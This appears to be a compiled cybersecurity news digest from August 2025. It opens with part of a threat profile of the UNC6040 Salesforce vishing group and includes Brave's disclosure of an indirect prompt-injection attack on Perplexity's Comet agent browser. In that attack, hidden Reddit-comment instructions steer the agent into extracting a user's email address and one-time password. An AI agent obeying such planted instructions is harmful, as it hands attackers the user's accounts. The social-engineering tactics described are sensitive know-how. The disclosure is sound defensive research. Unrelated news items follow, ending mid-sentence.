The group has successfully breached approximately 20 organizations across hospitality, retail, and education sectors3, demonstrating a clear preference for targets with substantial customer databases and valuable personally identifiable information. Perhaps most notably, the group successfully compromised Google’s own Salesforce environment through sophisticated OAuth token abuse4, highlighting their capability to breach even well-defended organizations.

What distinguishes UNC6040 from traditional threat actors is their primary reliance on social engineering rather than technical exploitation. By impersonating IT support personnel through voice calls, they guide victims to authorize malicious connected apps, specifically modified versions of Salesforce’s Data Loader tool1. This approach effectively bypasses traditional security controls including multi-factor authentication, representing a fundamental shift in the threat landscape that security teams must address.

Threat Actor Profile and Victimology
UNC6040’s targeting reveals a calculated approach to victim selection. The group primarily focuses on luxury retailers, hospitality organizations, and educational institutions3, with additional confirmed targeting of aviation, financial services, and technology companies2. This sector preference suggests a clear understanding of where high-value customer data concentrates and where cloud CRM adoption is mature.

The threat actor demonstrates varying levels of technical proficiency across different intrusions, with some operations achieving complete data extraction while others result in only partial exfiltration before detection1. This inconsistency may indicate either multiple operators with different skill levels or an evolving tradecraft as the group refines their techniques.

Intelligence suggests potential collaboration with other threat actors, particularly the ShinyHunters collective4. UNC6040 may engage in partnership models where initial compromise and data theft are followed by collaboration with specialized extortion groups months after the initial breach1. This delayed monetization strategy complicates attribution and incident response efforts.

Operational Capabilities and Techniques
The group’s attack methodology begins with extensive reconnaissance through automated phone systems and live calls where operators impersonate IT support staff53. This initial intelligence gathering phase allows them to understand organizational structures, identify key personnel, and develop credible pretexts for their social engineering approaches.

The technical implementation involves guiding victims to Salesforce’s connected app setup page where they authorize malicious applications using connection codes1. These modified Data Loader applications are often disguised with legitimate-sounding names such as “My Ticket Portal” to align with the social engineering narrative13. Once authorized, these applications provide API-level access enabling bulk data exfiltration through legitimate platform features.

Post-compromise activities extend beyond the initial Salesforce environment. The group demonstrates capability for lateral movement, targeting Okta, Microsoft 365, and Workplace environments to harvest additional credentials and expand their access32. They employ test queries before conducting full data extraction1, suggesting a methodical approach to validating access and identifying high-value datasets.

The group’s data exfiltration focuses on customer PII including names, dates of birth, addresses, phone numbers, and account metadata2. By avoiding custom malware and instead relying on legitimate tools and platform features, they maintain a minimal forensic footprint that complicates detection and attribution efforts2.

Infrastructure and Operational Security
UNC6040 demonstrates strong operational security practices, primarily accessing victim environments through Mullvad VPN IP addresses1. This VPN usage provides anonymity and complicates law enforcement efforts to track the group’s activities. The threat actors also utilize Okta phishing panels hosted on the same infrastructure as their vishing operations1, suggesting a centralized approach to their technical infrastructure.

The group’s infrastructure choices reflect an understanding of modern detection capabilities and a deliberate effort to blend malicious activity with legitimate traffic patterns. By leveraging standard Salesforce API calls and OAuth workflows4, they avoid triggering traditional security alerts focused on malware or anomalous network traffic.

Strategic Outlook and Future Developments
The success of UNC6040’s operations, including the high-profile breach of Google’s Salesforce environment4, will likely inspire both evolution of their own tactics and adoption of similar techniques by other threat actors. In the near term, we assess with moderate confidence that the group will expand their targeting to additional cloud CRM platforms as organizations increase security awareness around Salesforce-specific threats.

The demonstrated collaboration between UNC6040 and groups like ShinyHunters4 suggests a maturing criminal ecosystem where specialized actors collaborate to maximize the value extracted from compromised organizations. This partnership model is likely to expand, with UNC6040 potentially serving as an initial access broker for ransomware operations or other extortion groups.

The fundamental challenge posed by UNC6040 lies not in their technical sophistication but in their exploitation of human trust and legitimate platform features. As organizations implement phishing-resistant MFA and enhanced monitoring capabilities5, the group will likely evolve their social engineering tactics and potentially shift toward supply chain targeting through managed service providers and cloud service integrators.

Looking forward, the convergence of voice-based social engineering with OAuth abuse and API-level data access represents a maturation of the threat landscape that traditional perimeter-based security models are poorly equipped to address. Organizations must anticipate continued activity from UNC6040 and similar groups, with potential escalation in both the scale of operations and the sophistication of social engineering techniques employed.

The shift from technical exploitation to identity-based attacks demonstrated by UNC6040 requires a fundamental reconsideration of security architectures. As legitimate platform features become the primary vector for data exfiltration, the distinction between authorized and malicious activity becomes increasingly nuanced, demanding behavioral analytics and continuous monitoring capabilities that many organizations currently lack.

https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion/ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎

https://unit42.paloaltonetworks.com/retail-hospitality-heists-in-the-digital-age/ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎

https://www.varonis.com/blog/salesforce-vishing-threat-unc604 ↩︎ ↩︎ ↩︎ ↩︎ ↩︎

https://guardz.com/blog/from-vishing-to-oauth-abuse-how-shinyhunters-compromised-the-cloud/ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎

https://cloud.google.com/blog/topics/threat-intelligence/technical-analysis-vishing-threats/ ↩︎ ↩︎

brave.com blog Published Aug 20, 2025 -

The attack we developed shows that traditional Web security assumptions don't hold for agentic AI, and that we need new security and privacy architectures for agentic browsing.

The threat of instruction injection
At Brave, we’re developing the ability for our in-browser AI assistant Leo to browse the Web on your behalf, acting as your agent. Instead of just asking “Summarize what this page says about London flights”, you can command: “Book me a flight to London next Friday.” The AI doesn’t just read, it browses and completes transactions autonomously. This will significantly expand Leo’s capabilities while preserving Brave’s privacy guarantees and maintaining robust security guardrails to protect your data and browsing sessions.

This kind of agentic browsing is incredibly powerful, but it also presents significant security and privacy challenges. As users grow comfortable with AI browsers and begin trusting them with sensitive data in logged in sessions—such as banking, healthcare, and other critical websites—the risks multiply. What if the model hallucinates and performs actions you didn’t request? Or worse, what if a benign-looking website or a comment left on a social media site could steal your login credentials or other sensitive data by adding invisible instructions for the AI assistant?

To compare our implementation with others, we examined several existing solutions, such as Nanobrowser and Perplexity’s Comet. While looking at Comet, we discovered vulnerabilities which we reported to Perplexity, and which underline the security challenges faced by agentic AI implementations in browsers. The attack demonstrates how easy it is to manipulate AI assistants into performing actions that were prevented by long-standing Web security techniques, and how users need new security and privacy protections in agentic browsers.

The vulnerability we’re discussing in this post lies in how Comet processes webpage content: when users ask it to “Summarize this webpage,” Comet feeds a part of the webpage directly to its LLM without distinguishing between the user’s instructions and untrusted content from the webpage. This allows attackers to embed indirect prompt injection payloads that the AI will execute as commands. For instance, an attacker could gain access to a user’s emails from a prepared piece of text in a page in another tab.

How the attack works
Setup: An attacker embeds malicious instructions in Web content through various methods. On websites they control, attackers might hide instructions using white text on white backgrounds, HTML comments, or other invisible elements. Alternatively, they may inject malicious prompts into user-generated content on social media platforms such as Reddit comments or Facebook posts.
Trigger: An unsuspecting user navigates to this webpage and uses the browser’s AI assistant feature, for example clicking a “Summarize this page” button or asking the AI to extract key points from the page.
Injection: As the AI processes the webpage content, it sees the hidden malicious instructions. Unable to distinguish between the content it should summarize and instructions it should not follow, the AI treats everything as user requests.
Exploit: The injected commands instruct the AI to use its browser tools maliciously, for example navigating to the user’s banking site, extracting saved passwords, or exfiltrating sensitive information to an attacker-controlled server.
This attack is an example of an indirect prompt injection: the malicious instructions are embedded in external content (like a website, or a PDF) that the assistant processes as part of fulfilling the user’s request.

Attack demonstration
To illustrate the severity of this vulnerability in Comet, we created a proof-of-concept demonstration:

In this demonstration, you can see:

A user visits a Reddit post, with a comment containing the prompt injection instructions hidden behind the spoiler tag.

The user clicks the Comet browser’s “Summarize the current webpage” button.

While processing the page for summarization, the Comet AI assistant sees and processes these hidden instructions.

The malicious instructions command the Comet AI to:

Navigate to https://www.perplexity.ai/account/details and extract the user’s email address
Navigate to https://www.perplexity.ai./account and log in with this email address to receive an OTP (one-time password) from Perplexity (note that the trailing dot creates a different domain, perplexity.ai. vs perplexity.ai, to bypass existing authentication)
Navigate to https://gmail.com, where the user is already logged in, and read the received OTP
Exfiltrate both the email address and the OTP by replying to the original Reddit comment
The attacker learns the victim’s email address, and can take over their Perplexity account using the exfiltrated OTP and email address combination.

Once the user tries to summarize the Reddit post with the malicious comment in Comet, the attack happens without any further user input.

Impact and implications
This attack presents significant challenges to existing Web security mechanisms. When an AI assistant follows malicious instructions from untrusted webpage content, traditional protections such as same-origin policy (SOP) or cross-origin resource sharing (CORS) are all effectively useless. The AI operates with the user’s full privileges across authenticated sessions, providing potential access to banking accounts, corporate systems, private emails, cloud storage, and other services.

Unlike traditional Web vulnerabilities that typically affect individual sites or require complex exploitation, this attack enables cross-domain access through simple, natural language instructions embedded in websites. The malicious instructions could even be included in user-generated content on a website the attacker doesn’t control (for example, attack instructions hidden in a Reddit comment). The attack is both indirect in interaction, and browser-wide in scope.

The attack we developed shows that traditional Web security assumptions don’t hold for agentic AI, and that we need new security and privacy architectures for agentic browsing.

Possible mitigations
In our analysis, we came up with the following strategies which could have prevented attacks of this nature. We’ll discuss this topic more fully in the next blog post in this series.

The browser should distinguish between user instructions and website content
The browser should clearly separate the user’s instructions from the website’s contents when sending them as context to the backend. The contents of the page should always be treated as untrusted. Note that once the model on the backend gets passed both the trusted user request and the untrusted page contents, its output must be treated as potentially unsafe.

The model should check user-alignment for tasks
Based upon the task and the context, the model comes up with actions for the browser to take; these actions should be treated as “potentially unsafe” and should be independently checked for alignment against the user’s requests. This is related to the previous point about differentiating between the user’s requests (trusted) and the contents of the page (always untrusted).

Security and privacy sensitive actions should require user interaction
No matter the prior agent plan and tasks, the model should require explicit user interaction for security and privacy-sensitive tasks. For example: sending an email should always prompt the user to confirm right before the email is sent, and an agent should never automatically click through a TLS connection error interstitial.

The browser should isolate agentic browsing from regular browsing
Agentic browsing is an inherently powerful-but-risky mode for the user to be in, as this attack demonstrates. It should be impossible for the user to “accidentally” end up in this mode while casually browsing. Does the browser really need the ability to open your email account, send emails, and read sensitive data from every logged-in site if all you’re trying to do is summarize Reddit discussions? As with all things in the browser, permissions should be as minimal as possible. Powerful agentic capabilities should be isolated from regular browsing tasks, and this difference should be intuitively obvious to the user. This clean separation is especially important in these early days of agentic security, as browser vendors are still working out how to prevent security and privacy attacks. In future posts, we’ll cover more about how we are working towards a safer agentic browsing experience with fine-grained permissions.

Disclosure timeline
July 25, 2025: Vulnerability discovered and reported to Perplexity
July 27, 2025: Perplexity acknowledged the vulnerability and implemented an initial fix
July 28, 2025: Retesting revealed the fix was incomplete; additional details and comments were provided to Perplexity
August 11, 2025: One-week public disclosure notice sent to Perplexity
August 13, 2025: Final testing confirmed the vulnerability appears to be patched
August 20, 2025: Public disclosure of vulnerability details (Update: on further testing after this blog post was released, we learned that Perplexity still hasn’t fully mitigated the kind of attack described here. We’ve re-reported this to them.)
Research Motivation
We believe strongly in raising the privacy and security bar across the board for agentic browsing. A safer Web is good for everyone. As we saw, giving an agent authority to act on the Web, especially within a user’s authenticated context, carries significant security and privacy risks. Our goal with this research is to surface those risks early and demonstrate practical defenses. This helps Brave, Perplexity, other browsers, and (most importantly) all users.

We look forward to collaborating with Perplexity and the broader browser and AI communities on hardening agentic AI and, where appropriate, standardizing security boundaries that agentic features rely on.

Conclusion
This vulnerability in Perplexity Comet highlights a fundamental challenge with agentic AI browsers: ensuring that the agent only takes actions that are aligned with what the user wants. As AI assistants gain more powerful capabilities, indirect prompt injection attacks pose serious risks to Web security.

Browser vendors must implement robust defenses against these attacks before deploying AI agents with powerful Web interaction capabilities. Security and privacy cannot be an afterthought in the race to build more capable AI tools.

Since its inception, Brave has been committed to providing industry-leading privacy and security protections to its users, and to promoting Web standards that reflect this commitment. In the next blog post of the series we will talk about Brave’s approach to securing the browser agent in order to deliver secure AI browsing to our nearly 100 million users.

android-developers.googleblog.com 25 August 2025 Posted by Suzanne Frey – VP, Product, Trust & Growth for Android -
Starting in 2026 and in select countries first, Android apps must be registered to a verified developer in order to be installed.

You shouldn’t have to choose between open and secure. By engineering security into the core part of the OS, Android has proven that you can have both, and we continue taking new steps in that direction.

As new threats emerge, we’ve continued to evolve our defenses. Following recent attacks, including those targeting people's financial data on their phones, we've worked to increase developer accountability to prevent abuse. We’ve seen how malicious actors hide behind anonymity to harm users by impersonating developers and using their brand image to create convincing fake apps. The scale of this threat is significant: our recent analysis found over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.

To better protect users from repeat bad actors spreading malware and scams, we're adding another layer of security to make installing apps safer for everyone: developer verification.

Starting next year, Android will require all apps to be registered by verified developers in order to be installed by users on certified Android devices. This creates crucial accountability, making it much harder for malicious actors to quickly distribute another harmful app after we take the first one down. Think of it like an ID check at the airport, which confirms a traveler's identity but is separate from the security screening of their bags; we will be confirming who the developer is, not reviewing the content of their app or where it came from. This change will start in a few select countries specifically impacted by these forms of fraudulent app scams, often from repeat perpetrators.

Since we implemented verification requirements on Google Play in 2023, we have seen firsthand how helpful developer identification is in stopping bad actors from exploiting anonymity to distribute malware, commit financial fraud, and steal sensitive data. Bringing a similar process to Android more broadly will provide a consistent, common sense baseline of developer accountability across the ecosystem.

In early discussions about this initiative, we've been encouraged by the supportive initial feedback we've received. In Brazil, the Brazilian Federation of Banks (FEBRABAN) sees it as a “significant advancement in protecting users and encouraging accountability.” This support extends to governments as well, with Indonesia's Ministry of Communications and Digital Affairs praising it for providing a “balanced approach” that protects users while keeping Android open. Similarly, Thailand’s Ministry of Digital Economy and Society sees it as a “positive and proactive measure” that aligns with their national digital safety policies. And partners like the Developer’s Alliance have called this a “critical step” for ensuring “trust, accountability, and security” across the entire ecosystem.

To make this process as streamlined as possible, we are building a new Android Developer Console just for developers who only distribute outside of Google Play, so they can easily complete their verification; get an early look at how it works. A note for student and hobbyist developers: we know your needs are different from commercial developers, so we’re creating a separate type of Android Developer Console account for you.

If you distribute apps on Google Play, you’ve likely already met these verification requirements through the existing Play Console process. You can find more information about how these requirements apply to you in our guides.

To be clear, developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer. We believe this is how an open system should work—by preserving choice while enhancing security for everyone. Android continues to show that with the right design and security principles, open and secure can go hand in hand. For more details on the specific requirements, visit our website. We'll share more information in the coming months.

Timeline and how to prepare
To help you get ready, we encourage all developers who distribute apps on certified Android devices to sign up for early access. This is the best way to prepare and stay informed.

Early participants will also get:

An invitation to an exclusive community discussion forum.
Priority support for these new requirements.
The chance to provide feedback and help us shape the experience.

Here is the timeline to help you plan:
October 2025: Early access begins. Invitations will be sent out gradually.
March 2026: Verification opens for all developers.
September 2026: These requirements go into effect in Brazil, Indonesia, Singapore, and Thailand. At this point, any app installed on a certified Android device in these regions must be registered by a verified developer.
2027 and beyond: We will continue to roll out these requirements globally.

bloomberg.com 2025-08-26 - Twenty activists urging company to sever ties with Israeli military were arrested last week. Executive Brad Smith said he welcomed discussion but not disruption.

For the better part of a year, Microsoft Corp. has failed to quell a small but persistent revolt by employees bent on forcing the company to sever business ties with Israel over its war in Gaza.

The world’s largest software maker has requested help from the Federal Bureau of Investigation in tracking protests, worked with local authorities to try and prevent them, flagged internal emails containing words like “Gaza” and deleted some internal posts about the protests, according to employees and documents reviewed by Bloomberg. Microsoft has also suspended and fired protesters for disrupting company events.

Despite those efforts, a steady trickle of employees, sometimes joined by outside supporters, continue to speak out in an escalating guerilla campaign of mass emails and noisy public demonstrations. While still relatively small, the employee activism is notable given the weakening job market and the Trump administration’s crackdown on pro-Palestinian protests.

Last week, 20 people were arrested on a plaza at Microsoft’s Redmond, Washington, headquarters after disregarding orders by police to disperse. Instead, they chanted and called out Microsoft executives by name, linking arms as police dismantled their makeshift barricades and, one by one, zip-tied them and led them away.

On Tuesday, protesters occupied the office of Microsoft President Brad Smith, sharing video on the Twitch livestreaming platform that showed them chanting, hanging banners and briefly attempting to barricade a door with furniture. Smith didn’t appear to be there. Police detained at least two people who entered a building that houses the offices of senior executives, said Jill Green, a spokesperson for the Redmond Police Department. Others were protesting outside, she said.

An employee group called No Azure for Apartheid says that by selling software and artificial intelligence tools to Israel’s military, the company’s Azure cloud service is profiting from the deaths of civilians. Microsoft denies that, but the protests threaten to dent its reputation as a thoughtful employer and reasonable actor on the world stage. In recent years, Microsoft has generally stayed above the fray while its industry peers battled antitrust investigations, privacy scandals or controversial treatment of employees.

Now Microsoft is being forced to grapple with perhaps the most politically charged issue of the day: Israel’s treatment of Palestinians. Earlier this month, the company announced an investigation into reports by the Guardian newspaper and other news outlets that Israel’s military surveillance agency intercepted millions of Palestinian mobile phone calls, stored them on Microsoft servers then used the data to select bombing targets in Gaza. An earlier investigation commissioned by Microsoft found no evidence its software was used to harm people.

Microsoft says it expects customers to adhere to international law governing human rights and armed conflict, and that the company’s terms of service prohibit the use of Microsoft products to violate people’s rights. “If we determine that a customer — any customer — is using our technology in ways that violate our terms of service, we will take steps to address that,” Smith said in an interview last week, adding that the investigation should be completed within several weeks. Smith said employees were welcome to discuss the issue internally but that the company will not tolerate activities that disrupt its operation or staffers.

After Hamas’s deadly Oct. 7, 2023 attack on Israel, Microsoft executives were quick to offer condolences and support to employees. “Let us stand together in our shared humanity,” then-human resources chief Kathleen Hogan said in a note a few days after the attacks, which killed some 1,200 people, including civilians and soldiers.
Unity was short-lived: Jewish employees lamented what they said was a troubling rise in antisemitism. Palestinian staffers and their allies accused executives of ignoring concerns about their welfare and the war in Gaza, which has killed tens of thousands. The debate continued in internal chatrooms, meetings with human resources leaders and in question-and-answer sessions with executives. But the chatter was mostly limited to Microsoft’s halls.

That changed in early April at a bash Microsoft hosted to mark the 50th anniversary of the company’s founding. Early that morning, Vaniya Agrawal picked up Ibtihal Aboussad and drove to Microsoft’s campus. The two early-career company engineers — who respectively hail from the Chicago area and Morocco — had both decided to leave Microsoft over its ties to Israel, which had been documented in a series of articles, including by the Associated Press, and reached out to No Azure for Apartheid. “This isn’t just Microsoft Word with a little Clippy in the corner,” said Agrawal, who was arrested on Wednesday. “These are technological weapons. Cloud and AI are just as deadly as bombs and bullets.”

kyivindependent.com - Russian "cyber partisans" hacked a Russian TV provider on Aug. 24, broadcasting footage that revealed the country’s real battlefield and internal situation, a source in Ukraine’s military intelligence (HUR) told the Kyiv Independent on Aug. 25.

The video showing Russia’s fuel crisis, water shortages in occupied parts of Donetsk Oblast, Ukrainian strikes on oil refineries and Russia's military losses, was aired simultaneously on 116 television channels on Ukraine's Independence Day, according to the source.

"Three and a half years into the war, and (Russian President Vladimir) Putin has not fully captured a single Ukrainian region. Ukraine remains independent," the video says.

The source claimed that the "local cyber partisans" also blocked access for the provider's administrators, making it more difficult for them to interrupt the unauthorized broadcast.

At least 50,000 viewers in Moscow and other Russian regions were reportedly shown over three hours of footage. The broadcast also appeared on apps via the Apple Store, Google Play, Smart TVs, and other cable networks.

The Kyiv Independent could not verify these reports.

Ukrainian hackers have also been attacking Russian online platforms on a regular basis since Russia's full-scale invasion of Ukraine began in 2022.

In July, cyber specialists from HUR reportedly carried out a large-scale cyberattack against the network infrastructure of Russian energy giant Gazprom, causing significant disruptions.

bleepingcomputer.com By Lawrence Abrams August 25, 2025 -
U.S. insurance giant Farmers Insurance has disclosed a data breach impacting 1.1 million customers, with BleepingComputer learning that the data was stolen in the widespread Salesforce attacks.

Farmers Insurance is a U.S.-based insurer that provides auto, home, life, and business insurance products. It operates through a network of agents and subsidiaries, serving more than 10 million households nationwide.

The company disclosed the data breach in an advisory on its website, saying that its database at a third-party vendor was breached on May 29, 2025.

"On May 30, 2025, one of Farmers' third-party vendors alerted Farmers to suspicious activity involving an unauthorized actor accessing one of the vendor's databases containing Farmers customer information (the "Incident")," reads the data breach notification on its website.

"The third-party vendor had monitoring tools in place, which allowed the vendor to quickly detect the activity and take appropriate containment measures, including blocking the unauthorized actor. After learning of the activity, Farmers immediately launched a comprehensive investigation to determine the nature and scope of the Incident and notified appropriate law enforcement authorities."

The company says that its investigation determined that customers' names, addresses, dates of birth, driver's license numbers, and/or last four digits of Social Security numbers were stolen during the breach.

Farmers began sending data breach notifications to impacted individuals on August 22, with a sample notification [1, 2] shared with the Maine Attorney General's Office, stating that a combined total of 1,111,386 customers were impacted.

While Farmers did not disclose the name of the third-party vendor, BleepingComputer has learned that the data was stolen in the widespread Salesforce data theft attacks that have impacted numerous organizations this year.

BleepingComputer contacted Farmers with additional questions about the breach and will update the story if we receive a response.

The Salesforce data theft attacks
Since the beginning of the year, threat actors classified as 'UNC6040' or 'UNC6240' have been conducting social engineering attacks on Salesforce customers.

During these attacks, threat actors conduct voice phishing (vishing) to trick employees into linking a malicious OAuth app with their company's Salesforce instances.

Once linked, the threat actors used the connection to download and steal the databases, which were then used to extort the company through email.

The extortion demands come from the ShinyHunters cybercrime group, who told BleepingComputer that the attacks involve multiple overlapping threat groups, with each group handling specific tasks to breach Salesforce instances and steal data.

"Like we have said repeatedly already, ShinyHunters and Scattered Spider are one and the same," ShinyHunters told BleepingComputer.

"They provide us with initial access and we conduct the dump and exfiltration of the Salesforce CRM instances. Just like we did with Snowflake."

Other companies impacted in these attacks include Google, Cisco, Workday, Adidas, Qantas, Allianz Life, and the LVMH subsidiaries Louis Vuitton, Dior, and Tiffany & Co.

ncsc.admin.ch NCSC/OFCS 26.08.2025 - La semaine dernière, l’Office fédéral de la cybersécurité (OFCS) a enregistré une augmentation significative du nombre de signalements de phishing utilisant de fausses notifications de colis. Dans ce type d’attaque par SMS, les fraudeurs se font passer pour la Poste Suisse ou DPD afin d’obtenir des données sensibles des citoyennes et citoyens. Les utilisatrices et utilisateurs de produits Apple sont particulièrement touchés. Dans notre revue hebdomadaire, vous apprendrez comment reconnaître ces messages et vous en protéger.

Actuellement, l’OFCS reçoit de nombreux signalements concernant des SMS de phishing prétendant provenir de la Poste Suisse et de DPD. La vague d’attaques actuelle utilise de manière ciblée des protocoles de messagerie modernes tels que « iMessage » d’Apple et « Rich Communication Services » (RCS) d’Android. Contrairement aux SMS traditionnels, ces messages sont chiffrés de bout en bout. Ce chiffrement, qui est en réalité une fonctionnalité de sécurité destinée à protéger la vie privée, est exploité de manière stratégique par les cybercriminels. Il empêche les opérateurs de téléphonie mobile de scanner le contenu des messages à la recherche de liens malveillants et de les bloquer. Les escrocs contournent ainsi une ligne de défense importante et s’assurent que leurs messages atteignent très probablement les terminaux des victimes potentielles.

« iMessage » et messages groupés avec titre
Un aspect particulièrement perfide de cette méthode réside dans la manière dont les messages sont présentés. Les escrocs utilisent une fonctionnalité du RCS qui permet de donner un nom personnalisé aux messages groupés. Les victimes reçoivent ainsi une notification qui leur donne l’impression d’avoir été ajoutées à un groupe officiel tel que « Informations de livraison postale ». Cela semble beaucoup plus légitime qu’un simple message provenant d’un numéro étranger inconnu et réduit le seuil d’inhibition des destinataires.

Les malfaiteurs ont également recours à une astuce pour contourner les mesures de sécurité intégrées aux smartphones. Les systèmes d’exploitation modernes désactivent les liens contenus dans les messages provenant d’expéditeurs inconnus afin d’empêcher les utilisateurs d’accéder accidentellement à des sites de phishing. Les fraudeurs demandent donc aux victimes de répondre « Y » au message. Cette action est interprétée par le système d’exploitation comme une preuve de confiance, après quoi le lien malveillant, auparavant inactif, est activé et peut être cliqué. Les escrocs incitent ainsi leurs victimes à réduire activement la sécurité de leur propre appareil.

Toute la campagne est conçue pour manipuler psychologiquement les gens. En imitant des enseignes connues comme « La Poste Suisse », elle exploite le principe d’autorité. Tu trouveras plus d’infos sur ce principe dans la rétrospective hebdomadaire 31/2025. Parallèlement, les messages créent une pression énorme en utilisant des formulations telles que « la livraison n’a pas pu être effectuée » et en fixant des délais très courts pour une prétendue nouvelle livraison. Cette urgence vise à empêcher toute réflexion rationnelle et à inciter les destinataires à agir de manière impulsive. En cliquant sur le lien, l’utilisateur est redirigé vers une fausse page du site web officiel du service de livraison de colis, conçue de manière professionnelle. Sous prétexte de frais de réexpédition minimes, le site demande alors les données de la carte de crédit et d’autres informations personnelles.

Intel Corporation (INTC) www.intc.com Aug 22, 2025 • 4:53 PM EDT

U.S. Government to make $8.9 billion investment in Intel common stock as company builds upon its more than $100 billion expansion of resilient semiconductor supply chain

SANTA CLARA, Calif.--(BUSINESS WIRE)-- Intel Corporation today announced an agreement with the Trump Administration to support the continued expansion of American technology and manufacturing leadership. Under terms of the agreement, the United States government will make an $8.9 billion investment in Intel common stock, reflecting the confidence the Administration has in Intel to advance key national priorities and the critically important role the company plays in expanding the domestic semiconductor industry.

The government’s equity stake will be funded by the remaining $5.7 billion in grants previously awarded, but not yet paid, to Intel under the U.S. CHIPS and Science Act and $3.2 billion awarded to the company as part of the Secure Enclave program. Intel will continue to deliver on its Secure Enclave obligations and reaffirmed its commitment to delivering trusted and secure semiconductors to the U.S. Department of Defense. The $8.9 billion investment is in addition to the $2.2 billion in CHIPS grants Intel has received to date, making for a total investment of $11.1 billion.

“As the only semiconductor company that does leading-edge logic R&D and manufacturing in the U.S., Intel is deeply committed to ensuring the world’s most advanced technologies are American made,” said Lip-Bu Tan, CEO of Intel. “President Trump’s focus on U.S. chip manufacturing is driving historic investments in a vital industry that is integral to the country’s economic and national security. We are grateful for the confidence the President and the Administration have placed in Intel, and we look forward to working to advance U.S. technology and manufacturing leadership.”

“Intel is excited to welcome the United States of America as a shareholder, helping to create the most advanced chips in the world,” said Howard Lutnick, United States Secretary of Commerce. “As more companies look to invest in America, this administration remains committed to reinforcing our country’s dominance in artificial intelligence while strengthening our national security.”

Under the terms of today’s announcement, the government agrees to purchase 433.3 million primary shares of Intel common stock at a price of $20.47 per share, equivalent to a 9.9 percent stake in the company. This investment provides American taxpayers with a discount to the current market price while enabling the U.S. and existing shareholders to benefit from Intel’s long-term business success.

The government’s investment in Intel will be a passive ownership, with no Board representation or other governance or information rights. The government also agrees to vote with the Company’s Board of Directors on matters requiring shareholder approval, with limited exceptions.

The government will receive a five-year warrant, at $20 per share for an additional five percent of Intel common shares, exercisable only if Intel ceases to own at least 51% of the foundry business.

The existing claw-back and profit-sharing provisions associated with the government’s previously dispersed $2.2 billion grant to Intel under the CHIPS Act will be eliminated to create permanency of capital as the company advances its U.S. investment plans.

Investing in America’s Future

Intel has continued to strategically invest in research, development and manufacturing in the United States since the company’s founding in 1968. Over the last five years, Intel has invested $108 billion in capital and $79 billion in R&D, the majority of which were dedicated to expanding U.S.-based manufacturing capacity and process technology.

Intel is currently undertaking a significant expansion of its domestic chipmaking capacity, investing more than $100 billion to expand its U.S. sites. The company’s newest chip fabrication site in Arizona is expected to begin high-volume production later this year, featuring the most advanced semiconductor manufacturing process technology on U.S. soil.

Since joining the company as CEO in March, Tan has taken swift actions to strengthen Intel’s financial position, drive disciplined execution and revitalize an engineering-first culture. Today’s agreement supports the company’s broader strategy to position Intel for the future.

Strengthening the U.S. Technology Ecosystem

Intel’s U.S. investments come as many leading technology companies support President Trump’s agenda to achieve U.S. technology and manufacturing leadership.

Intel is deeply engaged with current and potential customers and partners who share its commitment to building a strong and resilient U.S. semiconductor supply chain.

Satya Nadella, Chairman and Chief Executive Officer, Microsoft: “The decades-long partnership between Microsoft and Intel has pioneered new frontiers of technology and showcased the very best of American ingenuity and innovation. Intel’s continued investment in strengthening the U.S. semiconductor supply chain, supported by President Trump’s bold strategy to rebuild this critical industry on American soil, will benefit the country and broader technology ecosystem for years to come.”

Michael Dell, Chairman and Chief Executive Officer, Dell Technologies: “The industry needs a strong and resilient U.S. semiconductor industry, and no company is more important to this mission than Intel. It’s great to see Intel and the Trump Administration working together to advance U.S. technology and manufacturing leadership. Dell fully supports these shared priorities, and we look forward to bringing a new generation of products to market powered by American-designed and manufactured Intel chips.”

Enrique Lores, President and CEO, HP: “We share Intel’s and the Trump Administration’s deep commitment to building a strong, resilient and secure U.S. semiconductor industry. Intel’s continued investment in domestic R&D and manufacturing is integral to future innovation and will strengthen the partnership between HP and Intel for years come. This is a defining moment for great American companies to lead the world in cutting-edge technologies that will shape the future.”

Matt Garman, AWS CEO: “Leading-edge semiconductors are the bedrock of every AI technology and cloud platform, making U.S. investment in this critical industry one of the most important technological, economic and national security imperatives of our time. Intel plays a vital role as one of the country’s leading chip manufacturers, and we applaud the Trump administration’s efforts to usher in a new era of American innovation in partnership with American companies.”

PJT Partners acted as Intel’s exclusive financial advisor in connection with this investment agreement.

About Intel

Intel (Nasdaq: INTC) is an industry leader, creating world-changing technology that enables global progress and enriches lives. Inspired by Moore’s Law, we continuously work to advance the design and manufacturing of semiconductors to help address our customers’ greatest challenges. By embedding intelligence in the cloud, network, edge and every kind of computing device, we unleash the potential of data to transform business and society for the better. To learn more about Intel’s innovations, go to newsroom.intel.com and intel.com.

Forward-Looking Statements

This release contains forward-looking statements, including with respect to: the agreement with the U.S. government and its expected benefits, including the anticipated timing of closing and impacts to Intel’s existing agreements with the U.S. government under the CHIPS Act; Intel’s investment plans, including in manufacturing expansion projects and R&D; and the anticipated production using Intel’s latest semiconductor process technology in Arizona later this year. Such statements involve many risks and uncertainties that could cause our actual results to differ materially from those expressed or implied, including those associated with: uncertainties as to the timing of the consummation of the transaction and the receipt of funding; Intel’s ability to effectively use the proceeds and realize and utilize the other anticipated benefits of the transaction as contemplated thereby; the availability of appropriations from the legislative branch of the U.S. government and the ability of the executive branch of the U.S. government to obtain funding and support contemplated by the transaction; the determination by the legislative, judicial or executive branches of the U.S. government that any aspect of the transaction was unauthorized, void or voidable; Intel’s ability to obtain additional or replacement financing, as needed; Intel’s ability to effectively assess, determine and monitor the financial, tax and accounting treatment of the transaction, together with Intel’s and the U.S. government’s obligations thereunder; litigation related to the transaction or otherwise; potential adverse reactions or changes to business relationships resulting from the announcement or completion of the transaction; the timing and achievement of expected business milestones; Intel’s ability to effectively comply with the broader legal and regulatory requirements and heightened scrutiny associated with government partnerships and contracts; the high level of competition and rapid technological change in the semiconductor industry; the significant long-term and inherently risky investments Intel is making in R&D and manufacturing facilities that may not realize a favorable return; the complexities and uncertainties in developing and implementing new semiconductor products and manufacturing process technologies; Intel’s ability to time and scale its capital investments appropriately; changes in demand for Intel’s products; macroeconomic conditions and geopolitical tensions and conflicts, including geopolitical and trade tensions between the U.S. and China, the impacts of Russia's war on Ukraine, tensions and conflict affecting Israel and the Middle East, and rising tensions between mainland China and Taiwan; the evolving market for products with AI capabilities; Intel’s complex global supply chain supporting its manufacturing facilities and incorporating external 